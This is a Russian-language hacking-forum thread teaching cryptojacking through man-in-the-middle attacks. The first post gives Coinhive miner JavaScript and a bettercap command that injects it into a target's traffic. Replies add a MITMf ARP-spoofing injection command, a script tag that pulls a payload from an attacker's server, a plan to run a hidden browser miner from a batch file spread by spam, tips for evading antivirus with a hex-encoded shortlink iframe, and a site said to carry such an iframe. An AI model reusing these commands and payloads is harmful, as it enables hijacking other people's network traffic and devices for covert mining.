• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья Майним криптовалюту с помощью MITM атаки

Tayrus

Tayrus

Grey Team
13.04.2017
360
731
Хайль всем, решил поделиться способ майнинга криптовалюты за счет MITM атаки.
Вы должны зарегаться тут:
Код:
https://coinhive.com/
Теперь создаем html файл с таким содержимым:
Код:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('SITE_KEY');
    miner.start();
</script>
Где же взять SITE_KEY ? :
Майним криптовалюту с помощью MITM атаки
Майним криптовалюту с помощью MITM атаки
Майним криптовалюту с помощью MITM атаки
Теперь заинжектим наш файл с помощью bettercap:
Код:
bettercap -I wlan0(интерфейс) -T <ip цели> --proxy-module injecthtml --html-file <путь к файлу .html>
Майним криптовалюту с помощью MITM атаки
ЗЫ. Если в сети много народу можно использовать xerosploit, у него есть функция инжекта для всех устройств, находящихся в сети.
 
D

Dark Defender

New member
08.11.2017
2
0
Приветствую! Спасибо за статью! А после перезагрузки компа майнинг прекращается?
 
pr0phet

pr0phet

Gold Team
02.04.2018
325
519
А что насчет SSLstrip?
Работает убого! Читай почти не работает. Мало того, что нужно юзеру подтвердить серт, так еще и инет валит раз через раз совсем. Про HSTS вообще молчу...
 
Последнее редактирование:
+Maxon4ik

+Maxon4ik

Active member
06.03.2018
27
48
Работает убого! Читай почти не работает. Мало того, что нужно юзеру подтвердить серт, так еще и инет валит раз через раз совсем. Про HSTS вообще молчу...
Как боженька смолвил)))))))))) c SSLstrip вообще все плохо!!!!!
 
L

Letun

Happy New Year
08.02.2018
51
32
ЗЫ. Если в сети много народу можно использовать xerosploit, у него есть функция инжекта для всех устройств, находящихся в сети.
можно так же использовать MITMf
mitmf -i wlan0 --inject --js-file <путь-до-файла> --arp --spoof --gateway <ip роутера>
 
  • Нравится
Реакции: andromeda42
ghost

ghost

YW1uZXNpYQo=
Gold Team
12.05.2016
1 535
3 096
Неплохо. Урезанный вариант старого доброго кофе майнера.
 
Lisenok

Lisenok

Happy New Year
02.04.2016
123
71
Код:
<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>
Вот попробуйте, внедряется тоже через митм..А ну выше писали об этом
 
centr

centr

Премиум
31.01.2017
414
410
Существует ( )он работает на порядок лучше, пробивает хром, правда не все сайты берёт, но гугл пробивает.

 
Последнее редактирование:
  • Нравится
Реакции: alex2k7 и Vertigo
F

fakecop

Happy New Year
23.12.2016
103
26
Так же можно сделать без митм атак
Создать html с тротлингом в половину, создать бат который будет запускать браузер в фоне с этой html и грамотно проспамить (конечно же это все только в теории)
А эту html можно как и на хост поставить, так и локально запускать на машине "жертвы"
 
+Maxon4ik

+Maxon4ik

Active member
06.03.2018
27
48
этот Скрипт палят АВ, а вот если использовать шортлинки и Iframe + получившийся iframe перевести в 16-ричную строку... тогда все норм!)))))
 
+Maxon4ik

+Maxon4ik

Active member
06.03.2018
27
48
Про iframe можно подробнее?
конечно, вот например нашел сайт......{http://} {runjiayuan} {.} {cn}, если открыть код страницы то первые 6 полных строк и будет то о чем я говорю.....ну и конечно открой диспечер задач и посмотри на загрузку процессора!!!!!! то что идет в скобках не очень понятно, но стоит преобразовать, и получим
<iframe src="{https://} {cnhv} {.} {co} {/3h2b2}" width="1" height="1" align="left"></iframe>
(фигурные скобки и пробелы надо убрать)------это и есть шортлинк в iframe))))))))))
 
Последнее редактирование:
  • Нравится
Реакции: fysh
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 515
3 353
Уже как больше полугода, браузер выдает предупреждение, что начинается майнинг в браузере. Даже стандартный IE EDGE в винде.
 
+Maxon4ik

+Maxon4ik

Active member
06.03.2018
27
48
Уже как больше полугода, браузер выдает предупреждение, что начинается майнинг в браузере. Даже стандартный IE EDGE в винде.
Я же скинул образец сайта, зайдите и посмотрите, сработает ваш АВ или нет
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб